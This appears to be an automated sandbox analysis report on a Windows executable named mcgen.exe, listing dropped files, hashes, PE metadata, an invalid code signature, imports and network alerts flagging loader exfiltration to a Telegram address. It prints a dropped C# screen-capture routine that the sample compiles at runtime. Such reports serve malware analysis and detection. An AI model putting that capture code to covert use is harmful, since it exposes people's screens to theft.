SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tziviy42.0uv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wankqemf.iqs.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xbbhm0ln.xut.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xc3uvhjq.3zz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xor13ixx.sin.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zcamho2y.3dh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\ppw2wipr\CSC774215641B8D46CBA5382B343227E316.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0946889386629204
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryFTak7Ynqqm8PN5Dlq5J:+RI+ycuZhNPTakSm8PNnqX
MD5:	581C9F2A81E8B57BCF9684B564229B40
SHA1:	2F2DAB5DEC9B4BAE16BEB7F77A38A56CFE4D89C9
SHA-256:	ADA3BD297375EC558513E755D6A42B1789EC06952024F7297D557191A1B695D5
SHA-512:	0916D828FFD83E9EAAFCBE4AA19516BC77437FAB84EB3430B2231EC4AA3D7F5BD4ABACA17BB00235B11C3910367E39582F91428B299D08C9A7A2A4C653663A61
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.p.w.2.w.i.p.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.p.w.2.w.i.p.r...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1004
Entropy (8bit):	4.154581034278981
Encrypted:	false
SSDEEP:	24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:	C76055A0388B713A1EABE16130684DC3
SHA1:	EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:	8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:	22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:	false
Preview:	.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (610), with no line terminators
Category:	dropped
Size (bytes):	613
Entropy (8bit):	5.31480928341981
Encrypted:	false
SSDEEP:	12:p37Lvkmb6KOkqe1xBkrk+ik/aew+WZETaeg9:V3ka6KOkqeFk/aX/ETaD
MD5:	DC86CED59DCB63F8952BBADEF5C5BCE3
SHA1:	B74978C71ED66A88571B8B1EF94131D83D81AF23
SHA-256:	789663961F9120312C6071862E342B70FBB748229AEE3AED1E6305CF0EF68BA9
SHA-512:	82D789E60C5DA622AB100CDC5BB37DAC5B9BEE400F28E435A135E11B5195936631ECC11A7219E6F0DDC25DB967C40FFAEC8A895DC27EB930A365AC7087EBFFB8
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.0.cs"

C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.155216368752039
Encrypted:	false
SSDEEP:	48:6U7oEAtf0KhzBU/zzf6mtJIN0KpW1ulra3nq:sNz0zGmAOYZK
MD5:	448894E619C75D1C82E2BF7A61CC29A1
SHA1:	C16DEBDE6AFB5A8192E120BC392A717D0DA1D2C9
SHA-256:	E6A28D3613ADC9F0E6A519BA018953FEB0A8733D250F628E58B5B1F8D7B72F1E
SHA-512:	66C12D55476025DCF4BE7C57574A682B041A87A23E312F20DCD6054AA72D383C0010CDDCD0F204FA28CD9A49830180429390F6835DE40BFEE15A827B8DF2DB66
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....evg...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k.......(....B.(j........9.Q...........{.........(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (717), with CRLF, CR line terminators
Category:	modified
Size (bytes):	1158
Entropy (8bit):	5.471343013033898
Encrypted:	false
SSDEEP:	24:KOalId3ka6KOkqeFk/aX/ETaiKax5DqBVKVrdFAMBJTH:+lkka6NkqeFkSX/E+iK2DcVKdBJj
MD5:	A0C3CFA85585001FA604B59FF909D7AF
SHA1:	47CD1812327E1D948261D722C014B8346D5625CF
SHA-256:	751521660F0AE1C13FE3D3CFA44489DB8BD8419A2D027AB46508D5A7F8E655B9
SHA-512:	868E191ED7465AE3DDD6A9220E36346D2D673D707314C6251E9314CA210BC5112CAC089761A55AB5E3C83633C0847862E0B15BC32D607FCE95A088DDA836ED10
Malicious:	false
Preview:	.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is

\Device\ConDrv

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.331807756485642
Encrypted:	false
SSDEEP:	3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
MD5:	195D02DA13D597A52F848A9B28D871F6
SHA1:	D048766A802C61655B9689E953103236EACCB1C7
SHA-256:	ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
SHA-512:	1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
Malicious:	false
Preview:	..Service Version: 0.0.0.0..user Version: 0.0.0.0....No user/signature is currently loaded...

\Device\Null

Download File

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	311
Entropy (8bit):	4.798660615109549
Encrypted:	false
SSDEEP:	6:Pz9AvmWxHLTSJALTSJALTSrcsWTo6wGv+wAFeMmvVOIHJFxMVlmJHaVFEG1vv:PpA5pTcgTcgTLs4omvtAFSkIrxMVlmJO
MD5:	EEB977516479625E459C02E8933317B3
SHA1:	F4A42A1DE54936B10BC1FE1018682F21DDAF2357
SHA-256:	2565EE1E830BBDE6F0F2CE4C2A32F5F42FF099DD280DE470BF38A3A7E788F47E
SHA-512:	0716E40DE67287CE498303B0E20C4B3F8E50779E3E3C676F7265689503A20EFEC20E65FE416682E197D1C471953BD23EA0C67DE62806B038D24F94D103EE9591
Malicious:	false
Preview:	..Pinging 585948 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.993430293629784
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	mcgen.exe
File size:	8'042'981 bytes
MD5:	211da2d6a5b8b04b49d1c837eecee46c
SHA1:	4abdbb0e47fc77ec67348f73e47e526dbdd1dc1f
SHA256:	17e89140548fc71f7670ea5ee7df6feab0101386b8d087a81056ac6812d77a51
SHA512:	0f9d7205546694ce505d13195873851eece8dfb32234ca8f9551e780e576a3c6f4b54a79f5a9c3e93441fb4a9d65875263f6bd4acc03dc5644d6af9ead2f5dc8
SSDEEP:	196608:WKD+kduwfI9jUCBB7m+mKOY7rXrZusooDmhfvsbnTNWH:B5zIHL7HmBYXrYoaUNo
TLSH:	5686338666C144FAF837A83DD9818A1BCB327E255730DAD7437447B54EB3AE0487A327
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d..

File Icon


Icon Hash:	e32fa4ab4bb64947

Static PE Info

General

Entrypoint:	0x14000ce20
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x67751E27 [Wed Jan 1 10:51:19 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	72c4e339b7af8ab1ed2eb3821c98713a

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	29/09/2021 02:00:00 29/09/2024 01:59:59
Subject Chain	CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
Version:	3
Thumbprint MD5:	5C82B2D08EFE6EE0794B52D4309C5F37
Thumbprint SHA-1:	3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
Thumbprint SHA-256:	60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
Serial:	00BFB15001BBF592D4962A7797EA736FA3

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007FE7F46BB4ACh
dec eax
add esp, 28h
jmp 00007FE7F46BB0CFh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007FE7F46BB878h
test eax, eax
je 00007FE7F46BB273h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007FE7F46BB257h
dec eax
cmp ecx, eax
je 00007FE7F46BB266h
xor eax, eax
dec eax
cmpxchg dword ptr [0003570Ch], ecx
jne 00007FE7F46BB240h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007FE7F46BB249h
int3
int3
int3
dec eax
sub esp, 28h
test ecx, ecx
jne 00007FE7F46BB259h
mov byte ptr [000356F5h], 00000001h
call 00007FE7F46BA9A5h
call 00007FE7F46BBC90h
test al, al
jne 00007FE7F46BB256h
xor al, al
jmp 00007FE7F46BB266h
call 00007FE7F46C87AFh
test al, al
jne 00007FE7F46BB25Bh
xor ecx, ecx
call 00007FE7F46BBCA0h
jmp 00007FE7F46BB23Ch
mov al, 01h
dec eax
add esp, 28h
ret
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [000356BCh], 00000000h
mov ebx, ecx
jne 00007FE7F46BB2B9h
cmp ecx, 01h
jnbe 00007FE7F46BB2BCh
call 00007FE7F46BB7EEh
test eax, eax
je 00007FE7F46BB27Ah
test ebx, ebx
jne 00007FE7F46BB276h
dec eax
lea ecx, dword ptr [000356A6h]
call 00007FE7F46C85A2h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3ca34	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x47000	0x103e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x44000	0x2238	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x7a959d	0x2448
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x58000	0x764	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3a080	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x39f40	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2b000	0x4a0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x29f70	0x2a000	b8c3814c5fb0b18492ad4ec2ffe0830a	False	0.5518740699404762	data	6.489205819736506	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2b000	0x12a28	0x12c00	e60178cf99b2f4fd257b06f2445a2d99	False	0.5243229166666666	data	5.7507635030665485	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x53f8	0xe00	dba0caeecab624a0ccc0d577241601d1	False	0.134765625	data	1.8392217063172436	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x44000	0x2238	0x2400	9cd1eac931545f28ab09329f8bfce843	False	0.4697265625	data	5.2645170849678795	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x47000	0x103e8	0x10400	ba7d9756a737d22062ac9e87bd5f4435	False	0.9790715144230769	data	7.968679116370686	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x58000	0x764	0x800	816c68eeb419ee2c08656c31c06a0fff	False	0.5576171875	data	5.2809528666624175	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x47220	0x38e	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	1.012087912087912
RT_ICON	0x475b0	0x731	PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced	1.0059750135795764
RT_ICON	0x47ce4	0xc14	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced	1.0035575679172057
RT_ICON	0x488f8	0x1991	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced	1.0016806722689076
RT_ICON	0x4a28c	0x2b7a	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	1.0009883198562444
RT_ICON	0x4ce08	0x9c8b	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced	1.000524017467249
RT_GROUP_ICON	0x56a94	0x5a	data	0.8111111111111111
RT_VERSION	0x56af0	0x3e8	data	0.446
RT_MANIFEST	0x56ed8	0x50d	XML 1.0 document, ASCII text	0.4694508894044857

Imports

DLL	Import
USER32.dll	CreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll
KERNEL32.dll	GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
ADVAPI32.dll	OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll	SelectObject, DeleteObject, CreateFontIndirectW

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-02T09:22:39.750486+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.6	49894	149.154.167.220	443	TCP
2025-01-02T09:22:39.750661+0100	2857751	ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST)	1	192.168.2.6	49894	149.154.167.220	443	TCP
2025-01-02T09:22:41.094206+0100	2857752	ETPRO MALWARE SynthIndi Loader CnC Response	1	149.154.167.220	443	192.168.2.6	49894	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 09:22:05.325412989 CET	49718	80	192.168.2.6	208.95.112.1
Jan 2, 2025 09:22:05.330235958 CET	80	49718	208.95.112.1	192.168.2.6
Jan 2, 2025 09:22:05.330300093 CET	49718	80	192.168.2.6	208.95.112.1
Jan 2, 2025 09:22:05.330420017 CET	49718	80	192.168.2.6	208.95.112.1
Jan 2, 2025 09:22:05.335273027 CET	80	49718	208.95.112.1	192.168.2.6
Jan 2, 2025 09:22:05.867588997 CET	80	49718	208.95.112.1	192.168.2.6
Jan 2, 2025 09:22:05.886663914 CET	49718	80	192.168.2.6	208.95.112.1
Jan 2, 2025 09:22:05.891746998 CET	80	49718	208.95.112.1	192.168.2.6
Jan 2, 2025 09:22:05.892767906 CET	49718	80	192.168.2.6	208.95.112.1
Jan 2, 2025 09:22:38.398116112 CET	49888	80	192.168.2.6	208.95.112.1
Jan 2, 2025 09:22:38.402924061 CET	80	49888	208.95.112.1	192.168.2.6
Jan 2, 2025 09:22:38.402996063 CET	49888	80	192.168.2.6	208.95.112.1
Jan 2, 2025 09:22:38.403181076 CET	49888	80	192.168.2.6	208.95.112.1
Jan 2, 2025 09:22:38.407991886 CET	80	49888	208.95.112.1	192.168.2.6
Jan 2, 2025 09:22:38.893599033 CET	80	49888	208.95.112.1	192.168.2.6
Jan 2, 2025 09:22:38.943870068 CET	49888	80	192.168.2.6	208.95.112.1
Jan 2, 2025 09:22:39.110428095 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.110449076 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.110614061 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.136713028 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.136730909 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.746376991 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.746793032 CET	49894	443	192.168.2.6	149.154.167.220
Jan 2, 2025 09:22:39.746817112 CET	443	49894	149.154.167.220	192.168.2.6
Jan 2, 2025 09:22:39.748145103 CET	443	49894	149.154.167.220	192.168.2.6
